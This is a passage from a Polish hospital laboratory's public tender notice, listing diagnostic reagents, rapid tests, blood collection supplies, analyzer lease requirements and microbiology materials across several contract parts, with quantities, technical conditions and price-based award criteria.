SUROWICA KONTROLNA DO ALKOHOLU ETYLOWEGO POZIOM I	ml	60											
SUROWICA KONTROLNA DO ALKOHOLU ETYLOWEGO POZIOM I	ml	60											
SUROWICA KONTROLNE CRP POZIOM I	ml	60											
SUROWICA KONTROLNE CRP POZIOM II	ml	20											
SUROWICA KONTROLNA  CKMB	ml	5											
SUROWICA KONTROLNA DO ASO          ( POZIOM N)	ml	5											
KUWETY JEDNORAZOWE	ilość ozn.	120000											
ODCZYNNIKI DO MODUŁU ISE-ISE CAL. SOLUTION 1	op.	12									1	Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznych.															
2	Wymóg dostarczenia ulotek/instrukcji używania spełniających wymagania określone w ust. 13.6., w szczególności pkt 3 i 7 załącznika do ww. rozporządzenia - metodyki muszą zawierać powtarzalność, odtwarzalność, czułość analityczną, etc.															
3	Surowice kontrolne tego samego producenta, co oferowane odczynniki. Obowiązkowe dołączenie przykładowych metryk surowic kontrolnych.															
4	Pakiet stanowi niepodzielną całość i nie podlega podziałowi															
5	Dołączenie dla każdego parametru aplikacji na analizator KONELAB 30 i															
6	Dostawca odczynników w okresie trwania umowy zapewnia bezpłatne koszty pracy autoryzowanego serwisu analizatora KONELAB 30I i koszty dojazdu.															
7	Niespełnienie warunków granicznych oraz dodatkowych spowoduje odrzucenie oferty.															
8	W kolumnie Numer kat. Wykonawca zobowiązany jest wpisać numer katalogowy każdego produktu stanowiącego przedmiot zamówienia w sposób umożliwiający identyfikację dostarczonego towaru z fakturą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5: 	Przedmiotem zamówienia są odczynniki do analizatora parametrów krytycznych BAYER - Rapidlab 348. - wg Załącznika Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bufory kalibracyjne 7,3/6,8	op.	5						Odzynniki  kompatybilne z urządzeniem.                                    
Płyn płuczący/kondycjonujący/odbiałczający 	op.	6							 Odzynniki  kompatybilne z urządzeniem.                                    
Butle z gazami kalibracyjnymi	op.	2							Odzynniki  kompatybilne z urządzeniem.                                    
Płyn do napełniania elektrody pH	op.	3							
Kontrola parametrów krytycznych poziomy N	op.	2							Materiały kontrolne z dostępem do programu opracowań statystycznych wyników kontrolnych zawierającym co najmniej: 
Analizę metody wraz z wyliczeniem SD, CV, TE, błędów znormalizowanych precyzji i dokładności oraz wykreśleniem karty OPS znormalizowanej 
 Analizę okresu roboczego z wykonaniem co najmniej krzywej Levey-Jenningsa i krzywej dokładności 
 Analizę porównawczą z innymi użytkownikami takich samych materiałów kontrolnych i wyliczenie błędu dokładności w stosunku do średniej grupowej
 Bezpośredni dostęp do opracowań przez internet, przeliczenia dostępne natychmiast po przesłaniu danych
Analiza prowadzona na danych skumulowanych
 Wprowadzane jednostki analityczne tradycyjne zgodne z dotychczas stosowanymi w laboratorium (dowolny wybór)
 Obsługa programu w języku polskim

Płyn do napełniania elektrody referencyjnej,Na,K	op.	3							
1	Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznych.											
2	Pakiet stanowi niepodzielną całość i nie podlega podziałowi											
3	Dostawca odczynników w okresie trwania umowy zapewnia bezpłatne koszty pracy autoryzowanego serwisu analizatorów i koszty dojazdu.											
4	Niespełnienie warunków granicznych oraz dodatkowych spowoduje odrzucenie oferty.											
5	W kolumnie Numer kat. Wykonawca zobowiązany jest wpisać numer katalogowy każdego produktu stanowiącego przedmiot zamówienia w sposób umożliwiający identyfikację dostarczonego towaru z fakturą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6: 	Przedmiotem zamówienia jest  dostawa pasków do analizy moczu wraz z dzierżawą analizatora - wg Załącznika Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Paski testowe do analizatora moczu	ozn.	12000
Mocz kontrolny poziom 1	 op.	1
Mocz kontrolny poziom 2	op.	1
1	Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznych.															
2	Pakiet stanowi niepodzielną całość i nie podlega podziałowi															
3	Dostawca odczynników w okresie trwania umowy zapewnia bezpłatne koszty pracy autoryzowanego serwisu analizatora i koszty dojazdu.															
4	Niespełnienie warunków granicznych oraz dodatkowych spowoduje odrzucenie oferty.															
5	W kolumnie Numer kat. Wykonawca zobowiązany jest wpisać numer katalogowy każdego produktu stanowiącego przedmiot zamówienia w sposób umożliwiający identyfikację dostarczonego towaru z fakturą										PARAMETRY GRANICZNE ANALIZATORA 1	Analizator wieloparametrowy, całkowicie automatyczny pracujący w systemie Random Access i STAT							
2	Analizator nie starszy niż 3 lata							
3	Paski oznaczające min. pH, glukozy, białka, bilirubiny, urobilinogenu, ketonów, nitratów, leukocytów,krwi/hemoglobiny							
4	Analizator posiadający zabezpieczenie zapobiegające kontaminacji próbek badanych -płukanie po każdym wykonanym teście							
5	Automatyczne określenie przez analizator zabarwienia i przejrzystości próbki moczu 							
6	Analizator posiadający dwie niezależne komory na paski testowe, z jednoczesną możliwością stosowania różnych pasków.							
7	Analizator automatycznie wykrywający rodzaj paska							
8	Czułość dla białka nie gorsza niż 20 mg/dl,dla glukozy nie gorsza niż 40 mg/dl							
9	Pomiar ciężaru właściwego moczu z dokładnością do 0.001g metodą refraktometryczną							
10	Możliwość użycia probówek standardowych							
11	Automatyczna kalibracja analizatora							
12	Automatyczne usuwanie zużytych pasków							
13	Minimalna wymagana objętość próbki - 2 ml							
14	Materiały kontrolne -mocz kontrolny pochodzenia ludzkiego							
15	Analizator z wbudowaną drukarką oraz czytnikiem kodów kreskowych							
16	Możliwość podpięcia do posiadanej w laboratorium sieci komputerowej z dwukierunkową transmisją danych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie Nr 7: 	Przedmiotem zamówienia jest  dostawa odczynników lateksowych i szybkich testów diagnostycznych oraz barwników hematologicznych i odczynników do analityki ogólnej - wg Załącznika Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZYNNIK REUMATOIDALNY (RF)	ilość ozn.	150 ozn.	300											1. Test jakościowy - aglutynacyjny
2. Kontrola dodatnia i ujemna w zestawie
3. Wykrywalność: 30 IU/ml, wystandaryzowana
RPR - CARBON	ilość ozn.	500 ozn.	1000											1. Test jakościowy - aglutynacyjny
2. Kontrola dodatnia i ujemna w zestawie
3. Kompletny zestaw z mieszadełkami, igłą do dozowania i płytkami testowymi.
hCG	ilość ozn.	20 ozn.	40											1. Test płytkowy immunochromatograficzny w moczu i surowicy
2. Czułość analityczna: 10 IU/ml
KRWE UTAJONA W KALE (FOB)	ilość ozn.	25 ozn.	200											1. Immunochromatograficzny test płytkowy do wykrywania krwi utajonej w kale bez diety.                                                                          2. Cut off: 10 ng/ml 
AMFETAMINA	test	1 test	1000											1. Test płytkowy w moczu,1000 ng/ml                                                                                                                    2. Metodyki muszą zawierać informację na temat reakcji krzyżowej
MARIHUANA	test	1 test	1000											1. Test płytkowy w moczu,50 ng/ml                                                                                                                     2. Metodyki muszą zawierać informację na temat reakcji krzyżowej
TRÓJCYKLICZNE ANTYDEPRESANTY TCA	test	1 test	50											1. Test płytkowy  w moczu                                                            2. Czułość - 1000 ng/ml.
BARBITURANY	test	1 test	100											1. Test płytkowy w moczu,300 ng/ml                                                                                                                     2. Metodyki muszą zawierać informację na temat reakcji krzyżowej
BENZODIAZEPINY	test	1 test	100											1. Test płytkowy w moczu,300 ng/ml                                                                                                                          2. Metodyki muszą zawierać informację na temat reakcji krzyżowej
PANEL AMP/BAR/BZD/COC/MET/MOP/MTD/EXTASY/TCA/THC	test	1 test	80											1. Test płytkowy w moczu                                                                                                           2. Metodyki muszą zawierać informację na temat reakcji krzyżowej
SYPHILIS test	test	1 test	10											1.immunochromatograficzny test płytkowy do wykrywania przeciwciał przeciwko Trepanoma pallidium (IgA, igM,iGg) 
SLE	test	50 testów	50											1. Aglutynacja cząsteczek lateksu
Anty - HCV 	test	50 tetów	600											1.Immunochromatograficzny test płytkowy do wykrywania przeciwciał przeciwko wirusowi zapalenia wątroby typu C, czułość i swoistość- 100%
Anty - HIV 1/2 	test	50 testów	600											1. Imuunochromatograficzny test płytkowy do wykrywania przeciwciał przeciwko ludzkiemu wirusowi upośledzenia odporności, czułość: 99,8%; swoistość 99,9 %Test wykrywający przeciwciała wytworzone przeciwko wszystkim podtypom ludzkiego wirusa upośledzenia odporności typu 1(HIV-1) i typu 2 (HIV-2)
HbsAg	test	50 testów	600											1. Immnochromatograficzny test płytkowy wykrywający antygen powierzchniowy wirusa zapalenia wątroby typu B, Cut off - 0,26 IU. Czułość i swoistość 100 %
Panel kardiologiczny Mioglobina/CKMB/Troponina	op.	1 test	20											1. Test płytkowy w surowicy,50/5/1 ng/ml                                                                                                                    2. Metodyki muszą zawierać informację na temat reakcji krzyżowej
Giardia lamblia	test	25 testów	200											1. Immunochromatograficzny jakościowy test płytkowy do wykrywania  antygenu Giardia lamblia w kale. 
Helicobacter pylori	test	25 testów	50											1. Immunochromatograficzny jakościowy test płytkowy do wykrywania  antygenu Helicobacter pylori w kale.                                                                      
Adenovirus/Rotavirus	test	25 testów	25											1. Immunochromatograficzny jakościowy test płytkowy do wykrywania  antygenów rotawirusa i adenowirusa i w kale. 
Odcznnik May-Grunwald	ml	1000 ml	5 000											
Odcznnik Giemsy	ml	1000 ml	4 000											
Odczynnik Extona 	ml	1000 ml	3 000											
Odczynnik Samsona	ml	100 ml	200											
Odczynnik Pandyego	ml	100 ml	200											
Odczynnik None-Apelta	ml	100 ml	200											
Cytofix	op.	100 ml	2											
Probówka z barwnikiem do oznaczania retikulocytów 	szt.	50 szt.	200										1	Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznyc-należy dołączyć oświadczenie																
2	Wymóg dostarczenia ulotek/instrukcji używania odczynników spełniających wymagania 																
3	Pakiet stanowi niepodzielną całość i nie podlega podziałowi																
4	Wymóg zachowania maksymalnych opakowań zestawów.																
5	Niespełnienie warunków granicznych oraz dodatkowych spowoduje odrzucenie oferty.																
6	W kolumnie Numer kat.Wykonawca zobowiązany jest wpisać numer katalogowy każdego produktu stanowiącego przedmiot zamówienia w sposób umożliwiający identyfikację dostarczonego towaru z fakturą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie Nr 8: 	Przedmiotem zamówienia są materiały pomocnicze do diagnostyki laboratoryjnej - wg Załącznika Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylne ezy z zakończeniem prostym i oczkiem o poj. 10 ml,	szt.	4 400
Kapilary z heparyną litową poj. 130 ul, długość 75 mm	szt.	2 000
Kapilary z heparyną sodową poj. 130 ul, długość 75 mm	szt.	1 000
Kapsy do zamykania otworów kapilar	szt.	3 000
Końcówki niebieskie do 1000 ul, typ Eppendorf	szt.	25 000
Końcówki żółte do 200 ul, typ Eppendorf	szt.	15 000
Korki do probówek 12 mm	szt.	2 000
Mieszalniki do kapilar	szt.	3 000
Naczynka z PS do analizatora Technicon, 0.5 ml, f14x25mm	szt.	33 000
Pojemnik na mocz, z podziałką, polem do opisu i zakrętką, sterylny (aseptyczny), f57 x 73 mm, pakowany indywidualnie,poj. 120 ml +/- 30 ml	szt.	2 400
Pojemnik z PP na kał, z zakrętką, etykietą i łopatką, sterylny (aseptyczny), f25 x 80 mm, poj. 25 ml +/- 5 ml	szt.	1 150
Pojemnik na mocz, z podziałką, polem do opisu i zakrętką, f57 x 73 mm, poj. 120 ml +/- 30 ml	szt.	4 750
Pojemnik z PP, z podziałką i zakrętką, sterylny (aseptyczny), pakowany indywidualnie, f38 x 65 mm, poj. 60 ml +/- 10 ml	szt.	408
Probówka stożkowa z PP, z zakrętką, podziałka: od 5 do 50 ml - co 5 ml, poj. 50 ml, f 30 x 119 mm, typ Falcon	szt.	1 145
Probówka stożkowa z PP, z zakrętką, podziałka: od 5 do 50 ml - co 5 ml, sterylna, pakowana indywidualnie, poj. 50 ml, f 30 x 119 mm, typ Falcon	szt.	100
Probówka z PP, z dnem stożkowym, z płaskim korkiem, poj. 1.5 ml, f10 x 40 mm, ze znacznikiem: 0.1, 0.5, 1.0 i 1.5 ml, bezbarwna, typ Eppendorf	szt.	1 000
Probówka z PP, z podziałką: 0.5, 1, 2.5, 5 i 10 ml, f16 x 100 mm, stożkowa	szt.	10 000
Probówka z PP, z podziałką, f12 x 55 mm, okrągłodenna, poj. 3 ml	szt.	6 000
Probówka z PS, z podziałką: 2.5, 5 i 10 ml, z korkiem, sterylna, f16x100mm, okrągłodenna	szt.	400
Szalki Petriego 90 mm, aseptyczne, bez wentylacji	szt.	150
Szkiełka nakrywkowe 22 x 22 mm	szt.	13 600
Szkiełka podstawowe z ciętymi krawędziami, z dwustronnym matowym polem do opisu o szerokości 20 mm	szt.	400
Szkiełka podstawowe z ciętymi krawędziami, gładkie	szt.	1 000
Szkiełka podstawowe ze szlifowanymi krawędziami, gładkie	szt.	250
Worki do autoklawu 400 x 780 mm	szt.	100
Wymazówka z drewna o długości 150 mm z wacikiem bawełnianym (f 5 mm)	szt.	3 450
Wymazówka z tworzywa sztucznego z wacikiem bawełnianymZ etykietą, w probówce transportowej, sterylna	szt.	1 650
Statyw na probówki typu Eppendorf, autoklawowalny na 100 probówek	szt.	5
Probówka stożkowa z przezroczystego PP, z zakrętką, podziałka: od 5 do 45 ml - co 5 ml oznaczona kolorem, z białym polem do opisu, poj. 50 ml, f 29 x 114 mm, typ Falcon	szt.	200
1	Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznych - należy dołączyć oświadczenie.														
2	Pakiet stanowi niepodzielną całość i nie podlega podziałowi.														
3	Dołączyć do oferty prospekty/katalog ze zdjęciami i opisem oferowanego sprzętu.														
4	W kolumnie Numer kat. Wykonawca zobowiązany jest wpisać numer katalogowy każdego produktu stanowiącego przedmiot zamówienia w sposób umożliwiający identyfikację dostarczonego towaru z fakturą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie Nr 9: 	Przedmiotem zamówienia jest  dostawa próżniowego systemu pobierania krwi wraz z dzierżawą aparatu do automatycznego oznaczania OB - wg Załącznika Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Probówka do analizy morfologii z EDTA K2  2 ml /13x75 mm/	szt.	15 000
Strzykawka do gazometrii z suchą heparyną litową zbalansowaną jonami wapnia, z zatyczką w komplecie  1 ml 	szt.	2 000
Probówka koagulologiczna z 3,2 % cytrynianem sodu 1,8-2,7 ml , ze zredukowaną przestrzenią martwą ponizej 1 ml /13x75 mm/	szt.	8 000
Probówka do OB. z cytrynianem sodowym, do aparatu 1,8 ml /8x100 mm/ 	szt.	4 000
Probówka do analizy surowicy krwi z aktywatorem krzepnięcia 5-6 ml, /13x100 ml /                         	szt.	18 000
Probówki do analizy glukozy z inhibitorem glikolizy ( fluorek sodu z szczawianem potasu )  2-4 ml , / 13x 75 mm /	szt.	300
Probówki do analizy morfologii z EDTA K2  0,5 ml z integralnym lejkiem, z korkiem	szt.	100
Nakłuwacz ostrzowy do krwi włośniczkowej 	szt.	100
Igła systemowa -bezpieczna z zabezpieczeniem  zintegrowanym z igłą nr 7 dł.  38-40 mm	szt.	2 500
Igła systemowa nr 8- bezpieczna z zabezpieczeniem  zintegrowanym z igłą dł. 38-40 mm	szt.	16 000
Igła systemowa motylkowa nr 8, dł. 18-20 mm ze złączem luer i zaworkiem sytemowym (komplet sterylny gotowy do użycia)	szt.	200
Igła systemowa motylkowa nr 6, dł. 18-20 mm, ze złączem luer i zaworkiem sytemowym (komplet sterylny gotowy do użycia)	szt.	200
Uchwyt do przenoszenia krwi ze strzykawki do probówki próżniowej w systemie zamknietym	szt.	100
Uchwyt jednorazowy z połączeniem igły systemowej na gwint	szt.	20 000
Adapter systemowy Luer z zaworkiem systemowym	szt.	2 000
Probówka do szybkiego uzyskiwania surowicy 4-5 ml, trombina/żel /13x100 mm/	szt.	500
Wymagania graniczne systemu zamknietego:															
1	System zapewnia bezpieczeństwo pracy personelowi oraz bezpieczeństwo i komfort pacjentom.														
2	Możliwość powtórnego wielokrotnego nakłucia probówki bez utraty próżni, możliwość wielokrotnego szczelnego zamknięcia probówki po otwarciu tym samym  korkiem bez konieczności zakręcania korka. 														
3	System umożliwia pobranie krwi do wszystkich badań z zakresy diagnostyki laboratoryjnej.														
4	System umożliwia pobranie krwi we wszystkich sytuacjach klinicznych za pomocą elementów dostępnych w ramach jednej oferty / w tym również próbek krwi tętniczej  i włośniczkowej /														
5	System umożliwia współpracę z tradycyjnym sprzętem posiadającym standardowe końcówki typu Luer / strzykawka, wenflon, cewnik / z zachowaniem zasad systemu zamkniętego.														
6	System będzie kompatybilny z wyposażeniem Zakładu Diagnostyki Laboratoryjnej 108 SzWzP SP ZOZ tj. wirówki, aparatura diagnostyczna oraz posiadanym przez Pracownię Mikrobiologii systemem do posiewów krwi. 														
7	Systemem zmknięty do poboru krwi zapewni pobrania krwi wg procedur mikrobiologicznych do butelek próżniowych na posiew krwi i płynów ustrojowych.														
8	Wszystkie elementy systemu, mogące mieć bezpośredni kontakt z krwią pacjenta sterylne, nie wymagające dodatkowych zabiegów  montażowych przed ich zużyciem  (poza połączeniem igły z probówką).														
9	System spełnia wszystkie wymogi normy ISO 6710 														
10	Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznych.														
11	Pakiet stanowi niepodzielną całość i nie podlega podziałowi.														
12	Zamawiający stawia wymóg dołączenia do oferty do celów porównawczych  po jednej sztuce zamawianego asortymentu. 														
13	Nie spełnienie warunków granicznych powoduje odrzucenie oferty.														
PARAMETRY GRANICZNE ANALIZATORA
1	Wewnetrzny system kontroli jakości próbki, przeprowadzający identyfikację oraz weryfikację materiału poprzez eliminację próbek o niewłaściwej objętości									
2	Wydajność 15 próbek na 30 minut									
3	Zintegrowane z aparatem mieszadło wewnętrzne									
4	Możliwość dwukierunkowej transmisji danych z i do aparatu z systemem informatycznym obecnym w Zakładzie Diagnostyki Laboratoryjnej 108 SzWzP									
5	Możliwość podłaczenia czytnika kodów paskowych									
6	Możliwość archiwizacji wyników.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie Nr 10: 	Przedmiotem zamówienia jest dostawa odczynników do analizatora immunodiagnostycznego wraz z jego dzierżawą - wg Załącznika Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TSH 	ozn.	2400
FT4	ozn.	300
FT3	ozn.	240
PSA	ozn.	720
TROPONINA 	ozn.	1020
HBsAg	ozn.	360
HIV Ab+Ag	ozn.	360
ANTY-HCV	ozn.	360
TOXOPLASMA IgG	ozn.	120
TOXOPLASMA IgM	ozn.	120
D-DIMER	ozn.	1020
BORELIOZA IgG	ozn.	180
BORELIOZA IgM	ozn.	180
CA 19-9	ozn.	30
CA 15-3	ozn.	30
CA 125	ozn.	30
CEA	ozn.	30
AFP	ozn.	30
PROKALCYTONINA	ozn.	30
MONONUKLEOZA IgM	ozn.	30
ANTY-HBs	ozn.	60
INNE AKCESORIA /Wymienić/		
1	Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznych.												
2	Oferent zobowiązany jest do załączenia na każdy oferowany odczynnik: deklaracji zgodności CE (art. 5.1 ustawy o wyrobach medycznych), kopii rejestracji wyrobu medycznego (art. 52 ustawy o wyrobach medycznych) bądź kopii powiadomienia Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych o wprowadzeniu wyrobu do obrotu (art. 105 ustawy).												
3	Wymóg dostarczenia ulotek/instrukcji używania spełniających wymagania określone w ust. 13.6., w szczególności pkt 3 i 7 załącznika do ww. rozporządzenia - metodyki muszą zawierać powtarzalność, odtwarzalność, czułość analityczną, etc.												
4	Metodyki muszą uwzględniać informacje o szybkim sposobie sprawdzenia stabilności odczynnika (granice absorbancji).												
5	Dołączenie raportów technicznych uwzględniających: zakres pomiarowy, powtarzalność, odtwarzalność, granicę detekcji, czułość analityczną, testy porównawcze z metodą referencyjną.												
6	Surowice kontrolne tego samego producenta, co oferowane odczynniki. Obowiązkowe dołączenie przykładowych metryk surowic kontrolnych.												
7	Pakiet stanowi niepodzielną całość i nie podlega podziałowi												
8	Niespełnienie warunków granicznych oraz dodatkowych spowoduje odrzucenie oferty.								PARAMETRY GRANICZNE ANALIZATORA			
Wieloparametrowy analizator do badań immunodiagnostycznych metodą : nieizotopową.							
Możliwość wykonywania w tym samym czasie kilku parametrów.							
Możliwość wykonywania pojedynczych testów bez zwiększania kosztów							
Odczynniki w postaci gotowej do użycia.							
Średni czas wykonania oznaczeń       15-60 min.							
Wykluczone ryzyko kontaminacji							
Analizator z modułem kontroli jakości 							
Bezpłatny serwis gwarancyjny analizatora i niezbędnego sprzętu (regularne przeglądy gwarancyjne, aktualizacja oprogramowania, części zamienne, dojazd ) przez cały czas trwania umowy							
Czas reakcji serwisu na zgłoszenie awarii i podjęcie naprawy: 48 godz.							
Instrukcja obsługi aparatu w języku polskim..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie Nr 11: 	Przedmiotem zamówienia jest dostawa odczynników do analizatora koagulologicznego ACL 200 i ACL 7000 - wg Załącznika Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw odczynników do oznaczania APTT	op.		10							1. Odczynnik ciekły.                                                        2. Trwałośc min. 3 tygodnie.
Zestaw odczynników do oznaczania PT	op.		10							1.Tromboplastyna rekombinowana.  ISI max 1,1                               2. Trwałośc min. 3 tygodnie.
Zestaw odczynników do oznaczania Czynnika VIII	op.		1							1. Met.chromogenne.                                                         2. Trwałość odczynnika min. 3 tygodnie.                            3. Możliwość zamrażania odczynnika.
Osocze kontrolne	op.		8							Materiały kontrolne z dostępem do programu opracowań statystycznych wyników kontrolnych zawierającym co najmniej: 
.          Analizę metody wraz z wyliczeniem SD, CV, TE, błędów znormalizowanych precyzji i dokładności oraz wykreśleniem karty OPS znormalizowanej 
         Analizę okresu roboczego z wykonaniem co najmniej krzywej Levey-Jenningsa i krzywej dokładności   Analizę porównawczą z innymi użytkownikami takich samych materiałów kontrolnych i wyliczenie błędu dokładności w stosunku do średniej grupowej
 Bezpośredni dostęp do opracowań przez internet, przeliczenia dostępne natychmiast po przesłaniu danych
 Analiza prowadzona na danych skumulowanych
 Wprowadzane jednostki analityczne tradycyjne zgodne z dotychczas stosowanymi w laboratorium (dowolny wybór)
 Obsługa programu w języku polskim
Kalibratory	op.		2							
Rotors	op.		10							
Emulsja referencyjna	op.		10							
1	Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznych.												
2	Wymóg dostarczenia ulotek/instrukcji używania spełniających wymagania określone w ust. 13.6., w szczególności pkt 3 i 7 załącznika do ww. rozporządzenia - metodyki muszą zawierać powtarzalność, odtwarzalność, czułość analityczną, etc.												
3	Pakiet stanowi niepodzielną całość i nie podlega podziałowi												
4	Dostawca odczynników w okresie trwania umowy zapewnia bezpłatne koszty pracy autryzowanego serwisu analizatora i koszty dojazdu.												
5	Niespełnienie warunków granicznych oraz dodatkowych spowoduje odrzucenie oferty.												
6	W kolumnie Numer kat. Wykonawca zobowiązany jest wpisać numer katalogowy każdego produktu stanowiącego przedmiot zamówienia w sposób umożliwiający identyfikację dostarczonego towaru z fakturą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie Nr 12: 	Przedmiotem zamówienia jest dostawa testów do identyfikacji i oznaczania lekowrażliwości metodą automatyczną na aparacie VITEK 2 oraz manualnej biochemicznej identyfikacji bakterii wraz z niezbędnymi odczynnikami - wg Załącznika Nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Karty identyfikacyjne dla bakterii G (-)	szt.	200										
Karty identyfikacyjne dla bakterii G (+)	szt.	100										
Karty do oznaczania lekooporności grzybów drożdżopodobnych	szt.	20										Wymienić dostępne karty oporności dla grzybów drożdżopodobnych
Karty oporności na antybiotyki dla bakterii G(-)	szt.	400										Wymienić dostępne karty oporności dla G(-)
Karty oporności na antybiotyki dla bakterii G(+)	szt.	200										Wymienić dostępne karty oporności dla G(+)
Karty do identyfikacji grzybów drożdżopodobnych	szt.	20										
Wzorce do densytometru	op.	1										
Probówki do densytometru	op.	1										
0,45 % NaCl do zawiesiny	op.	1										
Zestaw /szereg/ do identyfikacji pałeczek jelitowych wraz z odpowiednią ilością niezbędnych do użycia zestawu odczynników	op.	1										1. Szereg przystosowany do odczytu przez posiadane przez laboratorium oprogramowanie APIweb
Zestaw /szereg/ do identyfikacji paciorkowców wraz z odpowiednią ilością niezbędnych do użycia zestawu odczynników	op.	1										1. Szereg przystosowany do odczytu przez posiadane przez laboratorium oprogramowanie APIweb
Zestaw /szereg/ do identyfikacji pałeczek niefermentujących wraz z odpowiednią ilością niezbędnych do użycia zestawu odczynników	op.	1										1. Szereg przystosowany do odczytu przez posiadane przez laboratorium oprogramowanie APIweb
Zestaw /szereg/ do identyfikacji gronkowców wraz z odpowiednią ilością niezbędnych do użycia zestawu odczynników	op.	1										1. Szereg przystosowany do odczytu przez posiadane przez laboratorium oprogramowanie APIweb
Zestaw /szereg/ do identyfikacji bakterii z rodzaju Neiseria i Haemophilus wraz z odpowiednią ilością niezbędnych do użycia zestawu odczynników	op.	1										1. Szereg przystosowany do odczytu przez posiadane przez laboratorium oprogramowanie APIweb
1	Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznych.														
3	Dostawca odczynników w okresie trwania umowy zapewnia bezpłatne koszty pracy autoryzowanego serwisu analizatora i koszty dojazdu.														
4	Niespełnienie warunków granicznych oraz dodatkowych spowoduje odrzucenie oferty.														
5	W kolumnie Numer kat. Wykonawca zobowiązany jest wpisać numer katalogowy każdego produktu stanowiącego przedmiot zamówienia w sposób umożliwiający identyfikację dostarczonego towaru z fakturą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie Nr 13: 	Przedmiotem zamówienia jest  dostawa  materiałów do manualnej diagnostyki mikrobiologicznej dla potrzeb pracowni bakteriologicznej - wg Załącznika Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> AMPICILIN 10	szt.	200											1.Krążki pakowane po 50 szt.w opakowanie hermetycznie zamknięte w postaci zgrzanej foilii aluminiowej lub szklanej fiolki.
AMOXYCILIN 10	szt.	200											
AMOXICLAV 30	szt.	800											
AMIKACIN 30	szt.	200											2.Średnica krążka 6 mm.
TAZOCIN 36	szt.	100											
PENICYLINA G1	szt.	50											
